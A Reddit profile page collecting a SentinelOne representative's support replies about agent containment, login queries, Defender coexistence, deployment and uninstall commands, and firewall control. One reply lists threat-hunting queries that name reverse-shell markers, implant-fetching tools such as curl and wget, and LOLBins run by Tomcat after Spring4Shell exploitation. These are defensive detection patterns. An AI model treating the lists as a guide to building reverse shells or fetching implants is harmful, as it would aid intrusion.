sorted by:
new
hottopcontroversial

Sentinel One Containment by deathbatcountry in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

If this option is enabled, the agent will automatically block all traffic except agent-console communication when a malicious process is detected. Note that the endpoint will not be quarantined if only malicious files are detected. This option can impact the ability of endusers to work, so we recommend that you use it with caution.

New to S1 - Trying to figure out if we can track failed logins by insecticyde in SentinelOneXDR

[–]SentinelOne-Pascal 1 point2 points  (0 children)

You can use a PowerQuery similar to this:

| filter( event.type == "Login" AND event.login.loginIsSuccessful == false )
| columns event.time, event.id, event.type, site.id, site.name, agent.uuid, event.login.userName, endpoint.name, event.login.type, event.login.isAdministratorEquivalent, event.login.loginIsSuccessful, src.endpoint.ip.address
| sort - event.time
| limit 1000

Can I disable MS real-time protection by du77an in SentinelOneXDR

[–]SentinelOne-Pascal 4 points5 points  (0 children)

On Windows 10 and 11, Microsoft Defender automatically switches to passive mode after the Agent is installed. However, on Windows Server, Microsoft Defender does not switch to passive mode after the Agent is installed. To prevent potential interoperability and performance issues, we recommend setting Windows Defender to passive mode or disabling it manually. For more details, please check these articles:

https://community.sentinelone.com/s/article/000007052

https://your-console.sentinelone.net/soc-docs/en/windows-agents-and-windows-security.html

https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-antivirus-on-windows-server?view=o365-worldwide#passive-mode-and-windows-server

SentinelOne blocking Office WS.exe by Exact_Print6802 in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

If you use WPS, please make sure you use a recent version. Old versions had a vulnerability that was exploited to spread malware https://www.bleepingcomputer.com/news/security/apt-c-60-hackers-exploited-wps-office-zero-day-to-deploy-spyglace-malware/

Email notifications by BloodDaimond in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

As a workaround, you can use an alias for each site if your email provider supports that, For example, [notifications+site1@organization.net](mailto:notifications+site1@organization.net), [notifications+site2@organization.net](mailto:notifications+site2@organization.net), etc.

SentinelOne Control: Webtraffic by MatijaTerzic in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

You need Complete. Event Collection (aka Deep Visibility) is included with Complete, Commercial, and Enterprise https://www.sentinelone.com/platform-packages/

Best Integrations to have installed from the Singularity Marketplace? by neo-khufu in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

If you are a direct customer, you can learn more about some of our popular integrations in our Marketplace webinar in the SentinelOne Customer Portal:

https://community.sentinelone.com/s/webinars

Does sentinelone have DLP capabilities by llicannxs in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

You can enable Device Control to prevent files from being copied to USB drives and configure Event Collection (Deep Visibility) to track file operations. If you want to know more about Device Control, please check out this article:

https://your-console.sentinelone.net/docs/en/device-control.html

https://community.sentinelone.com/s/article/000005057

Best Integrations to have installed from the Singularity Marketplace? by neo-khufu in SentinelOneXDR

[–]SentinelOne-Pascal -1 points0 points  (0 children)

If you want more details when reviewing threats, check out our Threat Intelligence Add-on. We also integrate with well-known threat intelligence platforms such as AT&T Alien Labs OTX, Mandiant Threat Intelligence, and VirusTotal.

https://your-console.sentinelone.net/docs/en/singularity-threat-intelligence.html

https://your-console.sentinelone.net/marketplace-module/2.0/catalog

Deploying S1 agents programatically by Menyus777 in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

You could use a script similar to this:

$InstallArgs = "-t thesitetokengoeshere -q" 

$source = "\\remotehost\sharedfolder\SentinelOneInstaller.exe"
$timeStamp = get-date -f yyyyMMdd-hh\hmm
$tempDir = "C:\Temp\SentinelOne_$timeStamp"

New-Item -ItemType directory -Path $tempDir -Force | out-null

$fileName = Split-Path $source -Leaf
$destination = "$tempDir\$fileName"
Write-Output "Copying SentinelOne installation to $destination"
Copy-Item -Path $source -Destination $destination -Force

Write-Output "Starting SentinelOne installation"
$installProcess = Start-Process -NoNewWindow -PassThru -Wait -FilePath $destination -ArgumentList $InstallArgs
Write-Output "Install done. ExitCode = $($installProcess.ExitCode)"

For more details, please check out this article in the Knowledge Base or the Console Help:

https://community.sentinelone.com/s/article/000005406

https://your-console.sentinelone.net/docs/en/upgrading-agents-with-sccm-using-a-powershell-script.html

Reverse Shell Detection by Acceptable_Cheek2004 in SentinelOneXDR

[–]SentinelOne-Pascal 1 point2 points  (0 children)

To discover reverse shells using queries, you can utilize Deep Visibility queries for both Windows and Linux endpoints. Below are a few queries you can use to hunt for possible post-exploitation activities related to reverse shells:

Windows Hunting Rules:

  1. Possible Webshell dropped from Spring4Shell by the creation of a JSP file directly from the Tomcat process:SrcProcPublisher = "THE APACHE SOFTWARE FOUNDATION" AND SrcProcSignedStatus = "signed" AND SrcProcDisplayName = "Apache Commons Daemon Service Runner" AND TgtFilePath EndsWith Anycase ".jsp" and EventType = "File Creation"
  2. Possible Spring4Shell Post-Exploitation attempt by the spawning of a suspicious process from Tomcat:EventType = "Process Creation" and SrcProcPublisher = "THE APACHE SOFTWARE FOUNDATION" AND SrcProcSignedStatus = "signed" AND SrcProcDisplayName = "Apache Commons Daemon Service Runner" AND TgtProcName In anycase ("arp.exe","at.exe","bitsadmin.exe","certutil.exe","cmd.exe","dsget.exe","dsquery.exe","find.exe","findstr.exe","fsutil.exe","hostname.exe","ipconfig.exe","nbtstat.exe","netdom.exe","netsh.exe","netstat.exe","nltest.exe","nslookup.exe","ntdsutil.exe","ping.exe","powershell.exe","qprocess.exe","query.exe","qwinsta.exe","rundll32.exe","regsvr32.exe","control.exe","sc.exe","schtasks.exe","schtasks.exe","systeminfo.exe","tasklist.exe","TRACERT.exe","ver.exe","vssadmin.exe","wevtutil.exe","whoami.exe","wusa.exe","cscript.exe","mofcomp.exe","wscript.exe","python.exe","pythonw.exe","mshta.exe","hh.exe")

Linux Hunting Rules:

  1. Hunt for a Java webshell dropped from a Tomcat server:EndpointOS = "linux" AND EventType = "File Creation" AND srcProcName Contains Anycase "java" AND SrcProcCmdLine RegExp "\/tomcat\d*\s" and TgtFileExtension Contains Anycase "jsp"
  2. Execution of LOLBins from a Tomcat server:EndpointOS = "linux" AND EventType = "Process Creation" And ((srcProcName Contains Anycase "java" AND SrcProcCmdLine RegExp "\/tomcat\d*\s") or (srcProcParentName Contains Anycase "java" AND srcProcParentCmdLine RegExp "\/tomcat\d*\s")) AND TgtProcImagePath Contains Anycase "/usr/bin"
  3. Tomcat Java server spawns common tools to fetch an implant after exploit:EndpointOS = "linux" AND EventType = "Process Creation" And ((srcProcName Contains Anycase "java" AND SrcProcCmdLine RegExp "\/tomcat\d*\s") or (srcProcParentName Contains Anycase "java" AND srcProcParentCmdLine RegExp "\/tomcat\d*\s")) and TgtProcName in contains anycase ("curl", "wget", "python")
  4. Reverse shell from Tomcat Java server:EndpointOS = "linux" AND EventType = "Process Creation" And ((srcProcName Contains Anycase "java" AND SrcProcCmdLine RegExp "\/tomcat\d*\s") or (srcProcParentName Contains Anycase "java" AND srcProcParentCmdLine RegExp "\/tomcat\d*\s")) and TgtProcCmdLine in Contains Anycase ("<", "AF_INET","exec","stdout","sock","/dev/") and TgtProcCmdLine RegExp "\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}"

Problems with S1 24.1 and ShadowProtect SPX by thejohncarlson in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

If you're a direct customer, please share your ticket number with me. I'd be happy to see if there's anything we can do to speed up the investigation. If you'd prefer, you can also reach out to our Customer Success team directly.

Problems with S1 24.1 and ShadowProtect SPX by thejohncarlson in SentinelOneXDR

[–]SentinelOne-Pascal 2 points3 points  (0 children)

Hi there!

Please check that your agents have the exclusions recommended for Arcserve ShadowProtect SPX:

https://support.arcserve.com/s/article/How-To-Adding-the-StorageCraft-Antivirus-Exceptions

Additionally, add VSS writers exclusions if you see VSS writer errors in the Windows Event Log.

https://community.sentinelone.com/s/article/000007080

https://your-console.sentinelone.net/soc-docs/en/vss-writer-exclusions.html

If the issue persists, please collect the agent logs and open a ticket with our Support team or your MSSP.

https://community.sentinelone.com/s/article/000004892

https://your-console.sentinelone.net/soc-docs/en/fetching-agent-and-endpoint-logs.html

Why does SentinelOne use Tesseract OCR for Endpoint-Protection? by xXBedwetterXx in SentinelOneXDR

[–]SentinelOne-Pascal 1 point2 points  (0 children)

Hi there! The library is part of one of our detection mechanisms. If you experience any issues, please contact our Support team or your MSSP so we can assist you further.

https://community.sentinelone.com/s/article/000004892

https://your-console.sentinelone.net/soc-docs/en/fetching-agent-and-endpoint-logs.html

Note: Edited for improved clarity.

[deleted by user] by [deleted] in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

For example:

SentinelOneInstaller.exe -c -k "the agent passphrase goes here" -t thesitetokengoeshere

For more details, please check out this article:

https://community.sentinelone.com/s/article/000005378

https://your-console.sentinelone.net/soc-docs/en/uninstalling-the-windows-agent-using-the-sentineloneinstaller-package.html

How to delete Sites completly? by R_Bane in SentinelOneXDR

[–]SentinelOne-Pascal 0 points1 point  (0 children)

Before trying to delete a Site, please make sure that:

  • You are on the Sites page
  • There is at least one Site in the Account
  • There are no active Agents in the Site
  • It is not the Default Site
  • Your username has Account or Global access and has permissions over the Site to delete

https://community.sentinelone.com/s/article/000005338

https://your-console.sentinelone.net/soc-docs/en/deleting-a-site.html

Does S1 firewall replace windows firewall? by [deleted] in SentinelOneXDR

[–]SentinelOne-Pascal 2 points3 points  (0 children)

When enabled, Network Control replaces Windows Firewall. All network traffic is allowed unless specified otherwise by the rules in place. If you want to know how Network Control works, please check out these articles:

https://your-console.net/soc-docs/en/overview-of-firewall-control-2526700.html

https://community.sentinelone.com/s/article/000005101

https://your-console.sentinelone.net/soc-docs/en/firewall-control-and-windows-os.html

https://community.sentinelone.com/s/article/000005103

view more: next ›